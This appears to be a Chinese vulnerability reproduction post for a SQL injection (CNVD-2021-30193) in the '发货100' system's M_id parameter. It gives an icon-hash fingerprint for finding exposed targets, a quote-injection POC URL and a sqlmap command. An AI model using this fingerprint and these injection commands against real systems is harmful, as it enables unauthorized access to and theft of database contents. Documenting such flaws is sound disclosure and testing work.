发货100 M_id SQL注入漏洞 #CNVD-2021-30193

漏洞描述

发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息。

漏洞影响

发货100

网络测绘

icon_hash=”1420424513″

漏洞复现

主页面如下

20231031163421598-496827cb-815b-46dc-a006-899f510cb94f (1)

使用POC

/?M_id=1%27&type=product

20231031163509238-bee71e0c-d9c2-467f-ba1c-a3785631b676 (1)

数据库出现报错, 使用Sqlmap注入

sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id

20231031163559407-6a8fbd22-ceeb-49a9-b5a4-e4576fe4bf0e (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容